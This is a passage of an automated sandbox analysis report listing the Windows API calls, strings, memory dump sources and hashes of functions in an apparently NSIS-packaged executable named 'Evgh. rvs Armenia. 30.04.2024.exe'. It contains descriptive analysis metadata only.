                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 708d19ea551109b1b194d4ca49fea76d79e91ad51e4b41d80c3f3ea302a13512
                                                  • Instruction ID: a59996f4b7e9e068504c33c606b0867cc0e460aa155bd5cdf8ba5dd419a24ee0
                                                  • Opcode Fuzzy Hash: 708d19ea551109b1b194d4ca49fea76d79e91ad51e4b41d80c3f3ea302a13512
                                                  • Instruction Fuzzy Hash: 36C04C71B482017ADA21CF509D49F0777696750B41F5544657220E50E0C6B4E450E62D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SendMessageA.USER32(00000028,?,00000001,00403D48), ref: 00403F25
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: a8f75893dc3b55aa41c318e2ef09a39cbea3501df151919571824d83d4ea5f90
                                                  • Instruction ID: 65dbcc2540e3052566e14dce8ba9d4df8b534898b5f9aa1fd4013fdf277ded57
                                                  • Opcode Fuzzy Hash: a8f75893dc3b55aa41c318e2ef09a39cbea3501df151919571824d83d4ea5f90
                                                  • Instruction Fuzzy Hash: 62B092B6684200BADE228B00DD09F467AB2E7A8742F008024B200640B0CAB200A1DB19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 0040309F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                                  • Instruction ID: 8831d3de15784b4579c3d7b303db9b45d0c358e109056f74ce618eb3ecc3c243
                                                  • Opcode Fuzzy Hash: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                                  • Instruction Fuzzy Hash: 74B01231544200BFDB214F00DE05F057B21A790700F10C030B344780F082712460EB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00403CE1), ref: 00403F0E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: ada78b75a849097e4ca9a67b024144bc2dc907817df3d169ae3e4670e3dab934
                                                  • Instruction ID: 7637a56702c009cdf6d2df62dbdf6ab1f46e74dd5bb36fdb1abe1d05dca4f055
                                                  • Opcode Fuzzy Hash: ada78b75a849097e4ca9a67b024144bc2dc907817df3d169ae3e4670e3dab934
                                                  • Instruction Fuzzy Hash: 2EA002754085009BDB125B50FE089557A71B754701721C475B15551075C7315425EB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 004048AB
                                                  • GetDlgItem.USER32(?,00000408), ref: 004048B6
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404900
                                                  • LoadBitmapA.USER32(0000006E), ref: 00404913
                                                  • SetWindowLongA.USER32(?,000000FC,00404E8A), ref: 0040492C
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404940
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404952
                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404968
                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404974
                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404986
                                                  • DeleteObject.GDI32(00000000), ref: 00404989
                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049B4
                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049C0
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A55
                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A80
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A94
                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404AC3
                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404AD1
                                                  • ShowWindow.USER32(?,00000005), ref: 00404AE2
                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BDF
                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C44
                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C59
                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C7D
                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C9D
                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 00404CB2
                                                  • GlobalFree.KERNEL32(00000000), ref: 00404CC2
                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D3B
                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00404DE4
                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DF3
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E13
                                                  • ShowWindow.USER32(?,00000000), ref: 00404E61
                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404E6C
                                                  • ShowWindow.USER32(00000000), ref: 00404E73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  • Opcode ID: 7ea715c16600e50fe963d9e75a28cfa408fbc2d9e4a6c680b4b0ab3cb37f0c4b
                                                  • Instruction ID: c4f70692a945eeac8c46a5cc4d62b09966a4cf856849f89cf4e80ba5cf8d6073
                                                  • Opcode Fuzzy Hash: 7ea715c16600e50fe963d9e75a28cfa408fbc2d9e4a6c680b4b0ab3cb37f0c4b
                                                  • Instruction Fuzzy Hash: 0D0250B0A00209AFDB10DF54DC85AAE7BB5FB84315F10817AF611B62E1C7789D42CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040436F
                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404399
                                                  • SHBrowseForFolderA.SHELL32(?,0041F0F8,?), ref: 0040444A
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404455
                                                  • lstrcmpiA.KERNEL32(: Completed,Nonefficient Setup: Completed), ref: 00404487
                                                  • lstrcatA.KERNEL32(?,: Completed), ref: 00404493
                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044A5
                                                    • Part of subcall function 004054D7: GetDlgItemTextA.USER32(?,?,00000400,004044DC), ref: 004054EA
                                                    • Part of subcall function 00405F68: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FC0
                                                    • Part of subcall function 00405F68: CharNextA.USER32(?,?,?,00000000), ref: 00405FCD
                                                    • Part of subcall function 00405F68: CharNextA.USER32(?,"C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FD2
                                                    • Part of subcall function 00405F68: CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FE2
                                                  • GetDiskFreeSpaceA.KERNEL32(0041ECF0,?,?,0000040F,?,0041ECF0,0041ECF0,?,00000001,0041ECF0,?,?,000003FB,?), ref: 00404563
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040457E
                                                    • Part of subcall function 004046D7: lstrlenA.KERNEL32(Nonefficient Setup: Completed,Nonefficient Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045F2,000000DF,00000000,00000400,?), ref: 00404775
                                                    • Part of subcall function 004046D7: wsprintfA.USER32 ref: 0040477D
                                                    • Part of subcall function 004046D7: SetDlgItemTextA.USER32(?,Nonefficient Setup: Completed), ref: 00404790
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\Deinotherium$Nonefficient Setup: Completed$k]
                                                  • API String ID: 2624150263-3999379543
                                                  • Opcode ID: 70b1a66212ab45d461a1c2dd106845162ae904b35f6b36dac720ae7181b22bd9
                                                  • Instruction ID: 52af94dd87b45bde8ff603abcb7252099f64fe51c68325ad3ba2cad582a3dd3a
                                                  • Opcode Fuzzy Hash: 70b1a66212ab45d461a1c2dd106845162ae904b35f6b36dac720ae7181b22bd9
                                                  • Instruction Fuzzy Hash: A8A18DB1900209ABDB11AFA5DC45BEFB6B8EF84314F14843BF611B62D1D77C8A418B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DeleteFileA.KERNEL32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055C8
                                                  • lstrcatA.KERNEL32(00420D28,\*.*,00420D28,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405610
                                                  • lstrcatA.KERNEL32(?,00409014,?,00420D28,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405631
                                                  • lstrlenA.KERNEL32(?,?,00409014,?,00420D28,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405637
                                                  • FindFirstFileA.KERNEL32(00420D28,?,?,?,00409014,?,00420D28,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405648
                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F5
                                                  • FindClose.KERNEL32(00000000), ref: 00405706
                                                  Strings
                                                  • (B, xrefs: 004055F8
                                                  • \*.*, xrefs: 0040560A
                                                  • "C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe", xrefs: 0040559F
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004055AC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe"$(B$C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-299882418
                                                  • Opcode ID: 0c9b304e695f1c058b9bc3a1cf3591d3ca5b364e210f9e882a6ba4f41c3a16a2
                                                  • Instruction ID: 8f0c06671bf428c0f48d088e48fc2575de732930cf6b83f410cedc31bee7f7b4
                                                  • Opcode Fuzzy Hash: 0c9b304e695f1c058b9bc3a1cf3591d3ca5b364e210f9e882a6ba4f41c3a16a2
                                                  • Instruction Fuzzy Hash: 2051D330800A04BADB21AB618D45BBF7BB8DF82714F54457BF445721D2C73C4982DE6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040B6
                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 004040CA
                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004040E8
                                                  • GetSysColor.USER32(?), ref: 004040F9
                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404108
                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404117
                                                  • lstrlenA.KERNEL32(?), ref: 0040411A
                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404129
                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040413E
                                                  • GetDlgItem.USER32(?,0000040A), ref: 004041A0
                                                  • SendMessageA.USER32(00000000), ref: 004041A3
                                                  • GetDlgItem.USER32(?,000003E8), ref: 004041CE
                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040420E
                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0040421D
                                                  • SetCursor.USER32(00000000), ref: 00404226
                                                  • ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 00404239
                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404246
                                                  • SetCursor.USER32(00000000), ref: 00404249
                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404275
                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404289
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                  • String ID: : Completed$N$open$k]
                                                  • API String ID: 3615053054-2805497927
                                                  • Opcode ID: 42e76c6f9001a471086f2110f9b209c176cf8913a74361ede291af8c06ceb81d
                                                  • Instruction ID: 13510805d6fd3d88b19762a43a0fb8d51a409b78b81c3afae21fa77130ec6155
                                                  • Opcode Fuzzy Hash: 42e76c6f9001a471086f2110f9b209c176cf8913a74361ede291af8c06ceb81d
                                                  • Instruction Fuzzy Hash: 8A61B4B1A40205BFEB109F61DC45F6A7B69FB44751F10807AFB04BA2D1C7B8A951CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 40f8494239657d2e8864ccd35a5b2a20f251cf82d96748e84493e10ba4ff4366
                                                  • Instruction ID: 162af80c0e370fc685607c2eff3bc6c1c184a7d325dd4572e54487cb40a4b06a
                                                  • Opcode Fuzzy Hash: 40f8494239657d2e8864ccd35a5b2a20f251cf82d96748e84493e10ba4ff4366
                                                  • Instruction Fuzzy Hash: 67419B71804249AFCF058FA4CD459AFBBB9FF44310F00812AF551AA1A0C738EA51DFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrcpyA.KERNEL32(00421AB0,NUL,?,00000000,?,00000000,00405BD9,?,?), ref: 00405A55
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405BD9,?,?), ref: 00405A79
                                                  • GetShortPathNameA.KERNEL32(?,00421AB0,00000400), ref: 00405A82
                                                    • Part of subcall function 004058D5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E5
                                                    • Part of subcall function 004058D5: lstrlenA.KERNEL32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                  • GetShortPathNameA.KERNEL32(00421EB0,00421EB0,00000400), ref: 00405A9F
                                                  • wsprintfA.USER32 ref: 00405ABD
                                                  • GetFileSize.KERNEL32(00000000,00000000,00421EB0,C0000000,00000004,00421EB0,?,?,?,?,?), ref: 00405AF8
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B07
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B3F
                                                  • SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216B0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405B95
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405BA6
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BAD
                                                    • Part of subcall function 00405970: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe,80000000,00000003), ref: 00405974
                                                    • Part of subcall function 00405970: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405996
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                  • String ID: %s=%s$NUL$[Rename]
                                                  • API String ID: 222337774-4148678300
